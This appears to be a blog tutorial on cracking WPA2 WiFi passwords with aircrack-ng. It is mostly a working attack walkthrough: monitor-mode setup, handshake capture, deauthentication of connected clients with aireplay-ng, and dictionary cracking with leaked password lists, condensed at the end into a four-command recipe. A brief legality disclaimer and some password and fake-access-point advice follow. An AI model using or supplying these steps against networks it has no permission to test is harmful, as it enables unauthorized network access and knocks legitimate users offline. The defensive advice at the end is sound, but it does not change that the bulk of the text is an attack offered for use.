Hack WiFi Password

Cracking WPA2 wifi password is not really an easy thing to do, no you can’t crack it with a click and there is no software that will give you the password without some hard work … Don’t run away still you can crack it  with few steps here 🙂 and we will do it using aircrack-ng.

Requirements :

  1. Kali Linux or any Linux system with aircrack-ng installed
  2. A wireless network adapter that support monitor mode likea- Alfa 2W AWUS036NH
    b- Alfa AWUS036H
    c- wifiy-city 56G
    d- you can check this page for card compatibili compatibility drivers
  3. A word list comprising of all the possible different combination of pass
  4. Download Wordlist

These dictionaries that come with some of penetration tools

john.txt.bz2
twitter-banned.txt.bz2
conficker.txt.bz2
500-worst-passwords.txt.bz2
cain.txt.bz2

or

Leaked passwords dictionaries those were leaked or stolen from sites

phpbb.txt.bz2
elitehacker.txt.bz2
hak5.txt.bz2
hotmail.txt.bz2
myspace.txt.bz2

Now let’s get to work

1) Open up your terminal as root and type

ifconfig

This will show you all the networking interfaces connected to your device.

If your wireless network adapter is working fine you should see the  wlan0  the name may change if you have more then one connected wireless adapter.

2) Now to start monitor mode type

airmon-ng start wlan0

airmon-ng is a traffic monitoring tool
wlan0 is your wireless interface

With this command we started the monitor mode as it’s seen the monitor mode is working under wlan0mon , so this is your card name for now in the red area is a list of process id’s that cause trouble during the process so kill those processes by typing

kill <pid>

kill 549 633 965

Now type ifconfig. And this will show you the newly set monitoring interface
Ex : wlan0mon

3) To show list of available WiFi network type

airodump-ng wlan0mon


After you choose a network that you want to crack, stop the scan by pressing CTRL + C
airodump-ng
is a wifi packets capturing tool
wlan0mon is the wifi adapter  interface
airodump-ng  will start capturing all packets.
BSSID  (BSSID = base service set identifier)
Note
the following, because you will need it for the next step:

  1. BSSID
  2. CH
  3. ESSID

The STATION is showing how many clients are connected to the Router (with more stations are connected at the same router it will more easy to catch the Handshake)

4) Capturing the packets of your target network

Type the following command

airodump-ng -c <channel> -w <name(ESSID)> –bssid <bssid> wlan0mon
ex:  airodump-ng -c 11 -w Darkness –bssid C4:6E:1F:FE:8F:E6 wlan0mon 

This will start capturing the packets. And if you get the handshake, you don’t need the aireplay command…


If you don’t get the handshake yet, while the capturing of packets goes on, open a new terminal and type:


aireplay-ng = tool is for deauthentication.
aireplay-ng -0 0 -a C4:6E:1F:FE:8F:E6 -c E0:2C:B2:07:C4:8F wlan0mon (-a = router, -c = client) = This will disconnect only one specific connected clients from the router.
aireplay-ng -0 0 -a <bssid> wlan0mon = This will disconnect all connected clients from the router.


After few seconds stop the deauthentication using CTRL + C  (wait a few seconds and if you don’t get the handshake repeat the aireplay-ng command)
Now after we have successful captured the wpa handshake.

5) Cracking the Password

Use ls command to bring up all the current directories and files.


We need the file with .cap extension.
aircrack-ng is a tool that helps in cracking the password

Now all you have to do is wait until you see the lovely news ( KEY Found  )


All Step in few lines

1) airodump-ng wlan0mon
2) airodump-ng -c 11 -w Darkness –bssid C4:6E:1F:FE:8F:E6 wlan0mon
3) aireplay-ng -0 0 -a C4:6E:1F:FE:8F:E6 wlan0mon
4) aircrack-ng -w worldlist.txt Darkness.cap

Cracking wireless (WiFi) Networks without permission is illegal

The software (Kali Linux) is for testing wireless security and if used against a network which is not yours or you don’t have permission to crack is illegal!

It is true the network owner will probably not realize you have access to their internet connection which is why you should always use WPA2 level protection.

How to Make Sure Your WiFi Network is Secure

So now you have learned how to hack WiFi password you can use this information to make sure your WiFi network cannot be hacked, you must use WPA2 level security and use a long password made up of random numbers, letters & any of the 95 permitted characters.

Ex: jdf48!f487@4h4

Do not use a word that is in any dictionary in any language, name, football team, movie name, pets name, greek god or medical condition!

Random password = Secure Network!

Beware of Connecting to Open/Unsecured WiFi Networks

If you have ever seen a WiFi network available with no password on it and thought wow free internet, think again.

There is a growing number of cyber criminals who are deliberately setting up open (no password required) WiFi networks so that people connect to them and the criminal will just sit there and collect all your personal info, passwords and account login information.
Known as a Honeypot or Fake AP the WiFi network will look and work just like any other WiFi network. They will be more common in public places such as shopping districts with cafes and coffee shops where people will sit and look for open WiFi networks to use.
They might look like someones personal WiFi network they haven’t secured or will have a name like Starbucks or  Free Public WiFi to seem trustworthy.

We will learn how to make a Honeypot or Fake AP in latest tutorial.

Do not use this tutorials to harm someone.
The purpose of this tutorial is to learn!
I am not responsible for any damage that you make !!!

Loading